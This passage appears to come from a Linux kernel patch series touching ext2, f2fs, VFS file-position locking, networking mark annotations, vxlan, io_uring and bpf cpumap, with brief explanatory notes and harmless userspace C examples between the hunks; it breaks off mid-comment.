+  * second extended-fs super-block data in memory
+  */
+ struct ext2_sb_info {
+-	unsigned long s_frag_size;	/* Size of a fragment in bytes */
+-	unsigned long s_frags_per_block;/* Number of fragments per block */
+ 	unsigned long s_inodes_per_block;/* Number of inodes per block */
+-	unsigned long s_frags_per_group;/* Number of fragments in a group */
+ 	unsigned long s_blocks_per_group;/* Number of blocks in a group */
+ 	unsigned long s_inodes_per_group;/* Number of inodes in a group */
+ 	unsigned long s_itb_per_group;	/* Number of inode table blocks per group */
+@@ -188,15 +185,6 @@ static inline struct ext2_sb_info *EXT2_SB(struct super_block *sb)
+ #define EXT2_INODE_SIZE(s)		(EXT2_SB(s)->s_inode_size)
+ #define EXT2_FIRST_INO(s)		(EXT2_SB(s)->s_first_ino)
+ 
+-/*
+- * Macro-instructions used to manage fragments
+- */
+-#define EXT2_MIN_FRAG_SIZE		1024
+-#define	EXT2_MAX_FRAG_SIZE		4096
+-#define EXT2_MIN_FRAG_LOG_SIZE		  10
+-#define EXT2_FRAG_SIZE(s)		(EXT2_SB(s)->s_frag_size)
+-#define EXT2_FRAGS_PER_BLOCK(s)		(EXT2_SB(s)->s_frags_per_block)
+-
+ /*
+  * Structure of a blocks group descriptor
+  */
+diff --git a/fs/ext2/super.c b/fs/ext2/super.c
+index 3feea4b31fa7e..99b26fe20d17c 100644
+--- a/fs/ext2/super.c
++++ b/fs/ext2/super.c
+@@ -668,10 +668,9 @@ static int ext2_setup_super (struct super_block * sb,
+ 		es->s_max_mnt_count = cpu_to_le16(EXT2_DFL_MAX_MNT_COUNT);
+ 	le16_add_cpu(&es->s_mnt_count, 1);
+ 	if (test_opt (sb, DEBUG))
+-		ext2_msg(sb, KERN_INFO, "%s, %s, bs=%lu, fs=%lu, gc=%lu, "
++		ext2_msg(sb, KERN_INFO, "%s, %s, bs=%lu, gc=%lu, "
+ 			"bpg=%lu, ipg=%lu, mo=%04lx]",
+ 			EXT2FS_VERSION, EXT2FS_DATE, sb->s_blocksize,
+-			sbi->s_frag_size,
+ 			sbi->s_groups_count,
+ 			EXT2_BLOCKS_PER_GROUP(sb),
+ 			EXT2_INODES_PER_GROUP(sb),
+@@ -1012,14 +1011,7 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 		}
+ 	}
+ 
+-	sbi->s_frag_size = EXT2_MIN_FRAG_SIZE <<
+-				   le32_to_cpu(es->s_log_frag_size);
+-	if (sbi->s_frag_size == 0)
+-		goto cantfind_ext2;
+-	sbi->s_frags_per_block = sb->s_blocksize / sbi->s_frag_size;
+-
+ 	sbi->s_blocks_per_group = le32_to_cpu(es->s_blocks_per_group);
+-	sbi->s_frags_per_group = le32_to_cpu(es->s_frags_per_group);
+ 	sbi->s_inodes_per_group = le32_to_cpu(es->s_inodes_per_group);
+ 
+ 	sbi->s_inodes_per_block = sb->s_blocksize / EXT2_INODE_SIZE(sb);
+@@ -1045,11 +1037,10 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 		goto failed_mount;
+ 	}
+ 
+-	if (sb->s_blocksize != sbi->s_frag_size) {
++	if (es->s_log_frag_size != es->s_log_block_size) {
+ 		ext2_msg(sb, KERN_ERR,
+-			"error: fragsize %lu != blocksize %lu"
+-			"(not supported yet)",
+-			sbi->s_frag_size, sb->s_blocksize);
++			"error: fragsize log %u != blocksize log %u",
++			le32_to_cpu(es->s_log_frag_size), sb->s_blocksize_bits);
+ 		goto failed_mount;
+ 	}
+ 
+@@ -1066,12 +1057,6 @@ static int ext2_fill_super(struct super_block *sb, void *data, int silent)
+ 			sbi->s_blocks_per_group, sbi->s_inodes_per_group + 3);
+ 		goto failed_mount;
+ 	}
+-	if (sbi->s_frags_per_group > sb->s_blocksize * 8) {
+-		ext2_msg(sb, KERN_ERR,
+-			"error: #fragments per group too big: %lu",
+-			sbi->s_frags_per_group);
+-		goto failed_mount;
+-	}
+ 	if (sbi->s_inodes_per_group < sbi->s_inodes_per_block ||
+ 	    sbi->s_inodes_per_group > sb->s_blocksize * 8) {
+ 		ext2_msg(sb, KERN_ERR,
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index 4d1e48c676fab..78f39a78de29a 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -3431,7 +3431,6 @@ static inline bool __is_valid_data_blkaddr(block_t blkaddr)
+  * file.c
+  */
+ int f2fs_sync_file(struct file *file, loff_t start, loff_t end, int datasync);
+-void f2fs_truncate_data_blocks(struct dnode_of_data *dn);
+ int f2fs_do_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate_blocks(struct inode *inode, u64 from, bool lock);
+ int f2fs_truncate(struct inode *inode);
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 7b94f047cbf79..3ce6da4fac9c6 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -628,11 +628,6 @@ void f2fs_truncate_data_blocks_range(struct dnode_of_data *dn, int count)
+ 					 dn->ofs_in_node, nr_free);
+ }
+ 
+-void f2fs_truncate_data_blocks(struct dnode_of_data *dn)
+-{
+-	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
+-}
+-
+ static int truncate_partial_data_page(struct inode *inode, u64 from,
+ 								bool cache_only)
+ {
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index a010b4bc36d2c..9fe502485930f 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -923,6 +923,7 @@ static int truncate_node(struct dnode_of_data *dn)
+ 
+ static int truncate_dnode(struct dnode_of_data *dn)
+ {
++	struct f2fs_sb_info *sbi = F2FS_I_SB(dn->inode);
+ 	struct page *page;
+ 	int err;
+ 
+@@ -930,16 +931,25 @@ static int truncate_dnode(struct dnode_of_data *dn)
+ 		return 1;
+ 
+ 	/* get direct node */
+-	page = f2fs_get_node_page(F2FS_I_SB(dn->inode), dn->nid);
++	page = f2fs_get_node_page(sbi, dn->nid);
+ 	if (PTR_ERR(page) == -ENOENT)
+ 		return 1;
+ 	else if (IS_ERR(page))
+ 		return PTR_ERR(page);
+ 
++	if (IS_INODE(page) || ino_of_node(page) != dn->inode->i_ino) {
++		f2fs_err(sbi, "incorrect node reference, ino: %lu, nid: %u, ino_of_node: %u",
++				dn->inode->i_ino, dn->nid, ino_of_node(page));
++		set_sbi_flag(sbi, SBI_NEED_FSCK);
++		f2fs_handle_error(sbi, ERROR_INVALID_NODE_REFERENCE);
++		f2fs_put_page(page, 1);
++		return -EFSCORRUPTED;
++	}
++
+ 	/* Make dnode_of_data for parameter */
+ 	dn->node_page = page;
+ 	dn->ofs_in_node = 0;
+-	f2fs_truncate_data_blocks(dn);
++	f2fs_truncate_data_blocks_range(dn, ADDRS_PER_BLOCK(dn->inode));
+ 	err = truncate_node(dn);
+ 	if (err) {
+ 		f2fs_put_page(page, 1);
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index b6dad389fa144..ff47aad636e5b 100644
+--- a/fs/f2fs/super.c
++++ b/fs/f2fs/super.c
+@@ -1347,6 +1347,12 @@ default_check:
+ 		return -EINVAL;
+ 	}
+ 
++	if ((f2fs_sb_has_readonly(sbi) || f2fs_readonly(sbi->sb)) &&
++		test_opt(sbi, FLUSH_MERGE)) {
++		f2fs_err(sbi, "FLUSH_MERGE not compatible with readonly mode");
++		return -EINVAL;
++	}
++
+ 	if (f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb)) {
+ 		f2fs_err(sbi, "Allow to mount readonly mode only");
+ 		return -EROFS;
+@@ -1933,8 +1939,10 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 		seq_puts(seq, ",inline_dentry");
+ 	else
+ 		seq_puts(seq, ",noinline_dentry");
+-	if (!f2fs_readonly(sbi->sb) && test_opt(sbi, FLUSH_MERGE))
++	if (test_opt(sbi, FLUSH_MERGE))
+ 		seq_puts(seq, ",flush_merge");
++	else
++		seq_puts(seq, ",noflush_merge");
+ 	if (test_opt(sbi, NOBARRIER))
+ 		seq_puts(seq, ",nobarrier");
+ 	if (test_opt(sbi, FASTBOOT))
+@@ -2032,9 +2040,22 @@ static int f2fs_show_options(struct seq_file *seq, struct dentry *root)
+ 	return 0;
+ }
+ 
+-static void default_options(struct f2fs_sb_info *sbi)
++static void default_options(struct f2fs_sb_info *sbi, bool remount)
+ {
+ 	/* init some FS parameters */
++	if (!remount) {
++		set_opt(sbi, READ_EXTENT_CACHE);
++		clear_opt(sbi, DISABLE_CHECKPOINT);
++
++		if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
++			set_opt(sbi, DISCARD);
++
++		if (f2fs_sb_has_blkzoned(sbi))
++			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
++		else
++			F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
++	}
++
+ 	if (f2fs_sb_has_readonly(sbi))
+ 		F2FS_OPTION(sbi).active_logs = NR_CURSEG_RO_TYPE;
+ 	else
+@@ -2057,22 +2078,16 @@ static void default_options(struct f2fs_sb_info *sbi)
+ 	set_opt(sbi, INLINE_XATTR);
+ 	set_opt(sbi, INLINE_DATA);
+ 	set_opt(sbi, INLINE_DENTRY);
+-	set_opt(sbi, READ_EXTENT_CACHE);
+ 	set_opt(sbi, NOHEAP);
+-	clear_opt(sbi, DISABLE_CHECKPOINT);
+ 	set_opt(sbi, MERGE_CHECKPOINT);
+ 	F2FS_OPTION(sbi).unusable_cap = 0;
+ 	sbi->sb->s_flags |= SB_LAZYTIME;
+-	set_opt(sbi, FLUSH_MERGE);
+-	if (f2fs_hw_support_discard(sbi) || f2fs_hw_should_discard(sbi))
+-		set_opt(sbi, DISCARD);
+-	if (f2fs_sb_has_blkzoned(sbi)) {
++	if (!f2fs_sb_has_readonly(sbi) && !f2fs_readonly(sbi->sb))
++		set_opt(sbi, FLUSH_MERGE);
++	if (f2fs_sb_has_blkzoned(sbi))
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_LFS;
+-		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_SECTION;
+-	} else {
++	else
+ 		F2FS_OPTION(sbi).fs_mode = FS_MODE_ADAPTIVE;
+-		F2FS_OPTION(sbi).discard_unit = DISCARD_UNIT_BLOCK;
+-	}
+ 
+ #ifdef CONFIG_F2FS_FS_XATTR
+ 	set_opt(sbi, XATTR_USER);
+@@ -2244,7 +2259,7 @@ static int f2fs_remount(struct super_block *sb, int *flags, char *data)
+ 			clear_sbi_flag(sbi, SBI_NEED_SB_WRITE);
+ 	}
+ 
+-	default_options(sbi);
++	default_options(sbi, true);
+ 
+ 	/* parse mount options */
+ 	err = parse_options(sb, data, true);
+@@ -4141,7 +4156,7 @@ try_onemore:
+ 		sbi->s_chksum_seed = f2fs_chksum(sbi, ~0, raw_super->uuid,
+ 						sizeof(raw_super->uuid));
+ 
+-	default_options(sbi);
++	default_options(sbi, false);
+ 	/* parse mount options */
+ 	options = kstrdup((const char *)data, GFP_KERNEL);
+ 	if (data && !options) {
+diff --git a/fs/file.c b/fs/file.c
+index 35c62b54c9d65..dbca26ef7a01a 100644
+--- a/fs/file.c
++++ b/fs/file.c
+@@ -1036,12 +1036,28 @@ unsigned long __fdget_raw(unsigned int fd)
+ 	return __fget_light(fd, 0);
+ }
+ 
++/*
++ * Try to avoid f_pos locking. We only need it if the
++ * file is marked for FMODE_ATOMIC_POS, and it can be
++ * accessed multiple ways.
++ *
++ * Always do it for directories, because pidfd_getfd()
++ * can make a file accessible even if it otherwise would
++ * not be, and for directories this is a correctness
++ * issue, not a "POSIX requirement".
++ */
++static inline bool file_needs_f_pos_lock(struct file *file)
++{
++	return (file->f_mode & FMODE_ATOMIC_POS) &&
++		(file_count(file) > 1 || S_ISDIR(file_inode(file)->i_mode));
++}
++
+ unsigned long __fdget_pos(unsigned int fd)
+ {
+ 	unsigned long v = __fdget(fd);
+ 	struct file *file = (struct file *)(v & ~3);
+ 
+-	if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
++	if (file && file_needs_f_pos_lock(file)) {
+ 		v |= FDPUT_POS_UNLOCK;
+ 		mutex_lock(&file->f_pos_lock);
+ 	}
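
The fs/file.c hunk narrows when __fdget_pos() takes f_pos_lock: only when the
file is genuinely reachable more than one way (file_count() > 1), and always
for directories, because pidfd_getfd() can hand out an extra reference behind
the opener's back. The hazard being locked against is that one open file
description carries one shared offset, which the following userspace sketch
makes visible (two threads reading from the same fd; /etc/hostname is just a
convenient small file):

    #include <fcntl.h>
    #include <pthread.h>
    #include <stdio.h>
    #include <unistd.h>

    static int fd;

    static void *reader(void *arg)
    {
            char buf[4];
            ssize_t n = read(fd, buf, sizeof(buf));

            /* both threads advance the same f_pos */
            printf("%s read %zd bytes, offset now %lld\n",
                   (const char *)arg, n, (long long)lseek(fd, 0, SEEK_CUR));
            return NULL;
    }

    int main(void)
    {
            pthread_t a, b;

            fd = open("/etc/hostname", O_RDONLY);
            if (fd < 0)
                    return 1;
            pthread_create(&a, NULL, reader, "A");
            pthread_create(&b, NULL, reader, "B");
            pthread_join(a, NULL);
            pthread_join(b, NULL);
            close(fd);
            return 0;
    }
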
+diff --git a/fs/ntfs3/attrlist.c b/fs/ntfs3/attrlist.c
+index c0c6bcbc8c05c..81c22df27c725 100644
+--- a/fs/ntfs3/attrlist.c
++++ b/fs/ntfs3/attrlist.c
+@@ -52,7 +52,7 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 
+ 	if (!attr->non_res) {
+ 		lsize = le32_to_cpu(attr->res.data_size);
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS);
++		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+@@ -80,7 +80,7 @@ int ntfs_load_attr_list(struct ntfs_inode *ni, struct ATTRIB *attr)
+ 		if (err < 0)
+ 			goto out;
+ 
+-		le = kmalloc(al_aligned(lsize), GFP_NOFS);
++		le = kmalloc(al_aligned(lsize), GFP_NOFS | __GFP_NOWARN);
+ 		if (!le) {
+ 			err = -ENOMEM;
+ 			goto out;
+diff --git a/fs/open.c b/fs/open.c
+index 9541430ec5b30..51dc46620d033 100644
+--- a/fs/open.c
++++ b/fs/open.c
+@@ -1233,7 +1233,7 @@ inline int build_open_flags(const struct open_how *how, struct open_flags *op)
+ 		lookup_flags |= LOOKUP_IN_ROOT;
+ 	if (how->resolve & RESOLVE_CACHED) {
+ 		/* Don't bother even trying for create/truncate/tmpfile open */
+-		if (flags & (O_TRUNC | O_CREAT | O_TMPFILE))
++		if (flags & (O_TRUNC | O_CREAT | __O_TMPFILE))
+ 			return -EAGAIN;
+ 		lookup_flags |= LOOKUP_CACHED;
+ 	}
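
The fs/open.c fix tests __O_TMPFILE rather than O_TMPFILE because, on Linux,
O_TMPFILE is defined as (__O_TMPFILE | O_DIRECTORY); masking with the
composite value therefore also rejected every plain O_DIRECTORY open under
RESOLVE_CACHED. The flag composition can be checked from userspace (glibc
exposes O_TMPFILE with _GNU_SOURCE):

    #define _GNU_SOURCE
    #include <stdio.h>
    #include <fcntl.h>

    int main(void)
    {
            printf("O_TMPFILE   = %#o\n", O_TMPFILE);
            printf("O_DIRECTORY = %#o\n", O_DIRECTORY);
            /* nonzero: a plain directory open "looks like" O_TMPFILE
             * when tested with the composite mask */
            printf("O_DIRECTORY & O_TMPFILE = %#o\n",
                   O_DIRECTORY & O_TMPFILE);
            return 0;
    }
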
+diff --git a/fs/super.c b/fs/super.c
+index 7c140ee60c547..d138332e57a94 100644
+--- a/fs/super.c
++++ b/fs/super.c
+@@ -904,6 +904,7 @@ int reconfigure_super(struct fs_context *fc)
+ 	struct super_block *sb = fc->root->d_sb;
+ 	int retval;
+ 	bool remount_ro = false;
++	bool remount_rw = false;
+ 	bool force = fc->sb_flags & SB_FORCE;
+ 
+ 	if (fc->sb_flags_mask & ~MS_RMT_MASK)
+@@ -921,7 +922,7 @@ int reconfigure_super(struct fs_context *fc)
+ 		    bdev_read_only(sb->s_bdev))
+ 			return -EACCES;
+ #endif
+-
++		remount_rw = !(fc->sb_flags & SB_RDONLY) && sb_rdonly(sb);
+ 		remount_ro = (fc->sb_flags & SB_RDONLY) && !sb_rdonly(sb);
+ 	}
+ 
+@@ -951,6 +952,14 @@ int reconfigure_super(struct fs_context *fc)
+ 			if (retval)
+ 				return retval;
+ 		}
++	} else if (remount_rw) {
++		/*
++		 * We set s_readonly_remount here to protect filesystem's
++		 * reconfigure code from writes from userspace until
++		 * reconfigure finishes.
++		 */
++		sb->s_readonly_remount = 1;
++		smp_wmb();
+ 	}
+ 
+ 	if (fc->ops->reconfigure) {
+diff --git a/fs/sysv/itree.c b/fs/sysv/itree.c
+index 3b8567564e7e4..9925cfe571595 100644
+--- a/fs/sysv/itree.c
++++ b/fs/sysv/itree.c
+@@ -145,6 +145,10 @@ static int alloc_branch(struct inode *inode,
+ 		 */
+ 		parent = block_to_cpu(SYSV_SB(inode->i_sb), branch[n-1].key);
+ 		bh = sb_getblk(inode->i_sb, parent);
++		if (!bh) {
++			sysv_free_block(inode->i_sb, branch[n].key);
++			break;
++		}
+ 		lock_buffer(bh);
+ 		memset(bh->b_data, 0, blocksize);
+ 		branch[n].bh = bh;
+diff --git a/include/asm-generic/word-at-a-time.h b/include/asm-generic/word-at-a-time.h
+index 20c93f08c9933..95a1d214108a5 100644
+--- a/include/asm-generic/word-at-a-time.h
++++ b/include/asm-generic/word-at-a-time.h
+@@ -38,7 +38,7 @@ static inline long find_zero(unsigned long mask)
+ 	return (mask >> 8) ? byte : byte + 1;
+ }
+ 
+-static inline bool has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
++static inline unsigned long has_zero(unsigned long val, unsigned long *data, const struct word_at_a_time *c)
+ {
+ 	unsigned long rhs = val | c->low_bits;
+ 	*data = rhs;
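
Only the return type changes here: has_zero() computes a per-byte mask whose
high bits flag zero bytes, and collapsing that mask to bool discarded
information that callers such as find_zero() rely on. A standalone rendition
of the same bit trick, assuming a 64-bit unsigned long, a little-endian host
for the string example, and the generic 0x01/0x80 constants (the in-kernel
version reads them from struct word_at_a_time):

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    #define ONES  0x0101010101010101UL
    #define HIGHS 0x8080808080808080UL

    /* Returns a nonzero per-byte mask when any byte of v is zero; keeping
     * the full mask (not a bool) lets callers feed it to find_zero(). */
    static unsigned long has_zero(unsigned long v)
    {
            return (v - ONES) & ~v & HIGHS;
    }

    int main(void)
    {
            unsigned long w;

            memcpy(&w, "abc\0defg", sizeof(w)); /* 8 bytes incl. the NUL */
            printf("mask = %#lx\n", has_zero(w)); /* high bit of byte 3 set */
            return 0;
    }
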
+diff --git a/include/linux/f2fs_fs.h b/include/linux/f2fs_fs.h
+index ee0d75d9a302d..77055b239165a 100644
+--- a/include/linux/f2fs_fs.h
++++ b/include/linux/f2fs_fs.h
+@@ -104,6 +104,7 @@ enum f2fs_error {
+ 	ERROR_INCONSISTENT_SIT,
+ 	ERROR_CORRUPTED_VERITY_XATTR,
+ 	ERROR_CORRUPTED_XATTR,
++	ERROR_INVALID_NODE_REFERENCE,
+ 	ERROR_MAX,
+ };
+ 
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index 51857117ac099..c8ef3b881f03d 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -107,11 +107,12 @@ static inline struct inet_request_sock *inet_rsk(const struct request_sock *sk)
+ 
+ static inline u32 inet_request_mark(const struct sock *sk, struct sk_buff *skb)
+ {
+-	if (!sk->sk_mark &&
+-	    READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_fwmark_accept))
++	u32 mark = READ_ONCE(sk->sk_mark);
++
++	if (!mark && READ_ONCE(sock_net(sk)->ipv4.sysctl_tcp_fwmark_accept))
+ 		return skb->mark;
+ 
+-	return sk->sk_mark;
++	return mark;
+ }
+ 
+ static inline int inet_request_bound_dev_if(const struct sock *sk,
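
inet_request_mark() now snapshots sk->sk_mark once with READ_ONCE() and
reuses the local copy, pairing with the WRITE_ONCE() stores added to
net/core/sock.c further down; the annotations keep the compiler from tearing
or refetching a field that setsockopt(SO_MARK) can change concurrently. A
userspace analogue of both the macros and the snapshot-then-use pattern (the
volatile-cast definitions mirror the kernel's, simplified):

    #include <pthread.h>
    #include <stdio.h>

    #define READ_ONCE(x)     (*(const volatile __typeof__(x) *)&(x))
    #define WRITE_ONCE(x, v) (*(volatile __typeof__(x) *)&(x) = (v))

    static unsigned int mark;

    static void *writer(void *arg)
    {
            (void)arg;
            WRITE_ONCE(mark, 42);   /* the setsockopt(SO_MARK) side */
            return NULL;
    }

    int main(void)
    {
            pthread_t t;
            unsigned int m;

            pthread_create(&t, NULL, writer, NULL);
            /* snapshot once, then use the local copy consistently, as
             * inet_request_mark() now does with sk->sk_mark */
            m = READ_ONCE(mark);
            printf("mark snapshot: %u\n", m);
            pthread_join(t, NULL);
            return 0;
    }
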
+diff --git a/include/net/ip.h b/include/net/ip.h
+index 83a1a9bc3ceb1..530e7257e4389 100644
+--- a/include/net/ip.h
++++ b/include/net/ip.h
+@@ -93,7 +93,7 @@ static inline void ipcm_init_sk(struct ipcm_cookie *ipcm,
+ {
+ 	ipcm_init(ipcm);
+ 
+-	ipcm->sockc.mark = inet->sk.sk_mark;
++	ipcm->sockc.mark = READ_ONCE(inet->sk.sk_mark);
+ 	ipcm->sockc.tsflags = inet->sk.sk_tsflags;
+ 	ipcm->oif = READ_ONCE(inet->sk.sk_bound_dev_if);
+ 	ipcm->addr = inet->inet_saddr;
+diff --git a/include/net/route.h b/include/net/route.h
+index fe00b0a2e4759..af8431b25f800 100644
+--- a/include/net/route.h
++++ b/include/net/route.h
+@@ -171,7 +171,7 @@ static inline struct rtable *ip_route_output_ports(struct net *net, struct flowi
+ 						   __be16 dport, __be16 sport,
+ 						   __u8 proto, __u8 tos, int oif)
+ {
+-	flowi4_init_output(fl4, oif, sk ? sk->sk_mark : 0, tos,
++	flowi4_init_output(fl4, oif, sk ? READ_ONCE(sk->sk_mark) : 0, tos,
+ 			   RT_SCOPE_UNIVERSE, proto,
+ 			   sk ? inet_sk_flowi_flags(sk) : 0,
+ 			   daddr, saddr, dport, sport, sock_net_uid(net, sk));
+@@ -304,7 +304,7 @@ static inline void ip_route_connect_init(struct flowi4 *fl4, __be32 dst,
+ 	if (inet_sk(sk)->transparent)
+ 		flow_flags |= FLOWI_FLAG_ANYSRC;
+ 
+-	flowi4_init_output(fl4, oif, sk->sk_mark, ip_sock_rt_tos(sk),
++	flowi4_init_output(fl4, oif, READ_ONCE(sk->sk_mark), ip_sock_rt_tos(sk),
+ 			   ip_sock_rt_scope(sk), protocol, flow_flags, dst,
+ 			   src, dport, sport, sk->sk_uid);
+ }
+diff --git a/include/net/vxlan.h b/include/net/vxlan.h
+index 03bcc1ef0d61e..a46ec889acb73 100644
+--- a/include/net/vxlan.h
++++ b/include/net/vxlan.h
+@@ -548,12 +548,12 @@ static inline void vxlan_flag_attr_error(int attrtype,
+ }
+ 
+ static inline bool vxlan_fdb_nh_path_select(struct nexthop *nh,
+-					    int hash,
++					    u32 hash,
+ 					    struct vxlan_rdst *rdst)
+ {
+ 	struct fib_nh_common *nhc;
+ 
+-	nhc = nexthop_path_fdb_result(nh, hash);
++	nhc = nexthop_path_fdb_result(nh, hash >> 1);
+ 	if (unlikely(!nhc))
+ 		return false;
+ 
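
In the vxlan hunk the hash becomes u32 and is halved before reaching
nexthop_path_fdb_result(), because the nexthop code treats hashes as signed
31-bit values; a full 32-bit hash with the top bit set would go negative once
converted, skewing path selection or indexing out of bounds. The underlying
conversion pitfall in isolation (two's-complement behaviour assumed, as on
Linux ABIs):

    #include <stdio.h>

    int main(void)
    {
            unsigned int hash = 0xdeadbeefu; /* MSB set, as skb_get_hash()
                                              * may well return */
            int as_int = (int)hash;          /* negative once treated as int */

            printf("u32 %#x as int: %d\n", hash, as_int);
            printf("(hash >> 1) as int: %d\n",
                   (int)(hash >> 1));        /* 31 bits, never negative */
            return 0;
    }
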
+diff --git a/io_uring/io_uring.c b/io_uring/io_uring.c
+index f091153bc8540..ed8e9deae284a 100644
+--- a/io_uring/io_uring.c
++++ b/io_uring/io_uring.c
+@@ -2349,12 +2349,21 @@ int io_run_task_work_sig(struct io_ring_ctx *ctx)
+ 	return 0;
+ }
+ 
++static bool current_pending_io(void)
++{
++	struct io_uring_task *tctx = current->io_uring;
++
++	if (!tctx)
++		return false;
++	return percpu_counter_read_positive(&tctx->inflight);
++}
++
+ /* when returns >0, the caller should retry */
+ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 					  struct io_wait_queue *iowq,
+ 					  ktime_t *timeout)
+ {
+-	int token, ret;
++	int io_wait, ret;
+ 	unsigned long check_cq;
+ 
+ 	/* make sure we run task_work before checking for signals */
+@@ -2372,15 +2381,17 @@ static inline int io_cqring_wait_schedule(struct io_ring_ctx *ctx,
+ 	}
+ 
+ 	/*
+-	 * Use io_schedule_prepare/finish, so cpufreq can take into account
+-	 * that the task is waiting for IO - turns out to be important for low
+-	 * QD IO.
++	 * Mark us as being in io_wait if we have pending requests, so cpufreq
++	 * can take into account that the task is waiting for IO - turns out
++	 * to be important for low QD IO.
+ 	 */
+-	token = io_schedule_prepare();
++	io_wait = current->in_iowait;
++	if (current_pending_io())
++		current->in_iowait = 1;
+ 	ret = 1;
+ 	if (!schedule_hrtimeout(timeout, HRTIMER_MODE_ABS))
+ 		ret = -ETIME;
+-	io_schedule_finish(token);
++	current->in_iowait = io_wait;
+ 	return ret;
+ }
+ 
+diff --git a/io_uring/timeout.c b/io_uring/timeout.c
+index 4c6a5666541cf..b0cf05ebcbcc3 100644
+--- a/io_uring/timeout.c
++++ b/io_uring/timeout.c
+@@ -545,7 +545,7 @@ int io_timeout(struct io_kiocb *req, unsigned int issue_flags)
+ 		goto add;
+ 	}
+ 
+-	tail = ctx->cached_cq_tail - atomic_read(&ctx->cq_timeouts);
++	tail = data_race(ctx->cached_cq_tail) - atomic_read(&ctx->cq_timeouts);
+ 	timeout->target_seq = tail + off;
+ 
+ 	/* Update the last seq here in case io_flush_timeouts() hasn't.
+diff --git a/kernel/bpf/cpumap.c b/kernel/bpf/cpumap.c
+index 09141351d5457..08a8e81027289 100644
+--- a/kernel/bpf/cpumap.c
++++ b/kernel/bpf/cpumap.c
+@@ -26,6 +26,7 @@
+ #include <linux/workqueue.h>
+ #include <linux/kthread.h>
+ #include <linux/capability.h>
++#include <linux/completion.h>
+ #include <trace/events/xdp.h>
+ #include <linux/btf_ids.h>
+ 
+@@ -71,6 +72,7 @@ struct bpf_cpu_map_entry {
+ 	struct rcu_head rcu;
+ 
+ 	struct work_struct kthread_stop_wq;
++	struct completion kthread_running;
+ };
+ 
+ struct bpf_cpu_map {
+@@ -134,11 +136,17 @@ static void __cpu_map_ring_cleanup(struct ptr_ring *ring)
+ 	 * invoked cpu_map_kthread_stop(). Catch any broken behaviour
+ 	 * gracefully and warn once.
+ 	 */
+-	struct xdp_frame *xdpf;
++	void *ptr;
+ 
+-	while ((xdpf = ptr_ring_consume(ring)))
+-		if (WARN_ON_ONCE(xdpf))
+-			xdp_return_frame(xdpf);
++	while ((ptr = ptr_ring_consume(ring))) {
++		WARN_ON_ONCE(1);
++		if (unlikely(__ptr_test_bit(0, &ptr))) {
++			__ptr_clear_bit(0, &ptr);
++			kfree_skb(ptr);
++			continue;
++		}
++		xdp_return_frame(ptr);
++	}
+ }
+ 
+ static void put_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+@@ -158,7 +166,6 @@ static void put_cpu_map_entry(struct bpf_cpu_map_entry *rcpu)
+ static void cpu_map_kthread_stop(struct work_struct *work)
+ {
+ 	struct bpf_cpu_map_entry *rcpu;
+-	int err;
+ 
+ 	rcpu = container_of(work, struct bpf_cpu_map_entry, kthread_stop_wq);
+ 
+@@ -168,14 +175,7 @@ static void cpu_map_kthread_stop(struct work_struct *work)
+ 	rcu_barrier();
+ 
+ 	/* kthread_stop will wake_up_process and wait for it to complete */
+-	err = kthread_stop(rcpu->kthread);
+-	if (err) {
+-		/* kthread_stop may be called before cpu_map_kthread_run
+-		 * is executed, so we need to release the memory related
+-		 * to rcpu.
+-		 */
+-		put_cpu_map_entry(rcpu);
+-	}
++	kthread_stop(rcpu->kthread);
+ }
+ 
+ static void cpu_map_bpf_prog_run_skb(struct bpf_cpu_map_entry *rcpu,
+@@ -303,11 +303,11 @@ static int cpu_map_bpf_prog_run(struct bpf_cpu_map_entry *rcpu, void **frames,
+ 	return nframes;
+ }
+ 
+-
+ static int cpu_map_kthread_run(void *data)
+ {
+ 	struct bpf_cpu_map_entry *rcpu = data;
+ 
++	complete(&rcpu->kthread_running);
+ 	set_current_state(TASK_INTERRUPTIBLE);
+ 
+ 	/* When kthread gives stop order, then rcpu have been disconnected
+@@ -472,6 +472,7 @@ __cpu_map_entry_alloc(struct bpf_map *map, struct bpf_cpumap_val *value,
+ 		goto free_ptr_ring;
+ 
+ 	/* Setup kthread */
++	init_completion(&rcpu->kthread_running);
+ 	rcpu->kthread = kthread_create_on_node(cpu_map_kthread_run, rcpu, numa,
+ 					       "cpumap/%d/map:%d", cpu,
+ 					       map->id);
+@@ -485,6 +486,12 @@ __cpu_map_entry_alloc(struct bpf_map *map, struct bpf_cpumap_val *value,
+ 	kthread_bind(rcpu->kthread, cpu);
+ 	wake_up_process(rcpu->kthread);
+ 
++	/* Make sure the kthread is running, so kthread_stop() will not
++	 * stop it prematurely and all pending frames or skbs will be
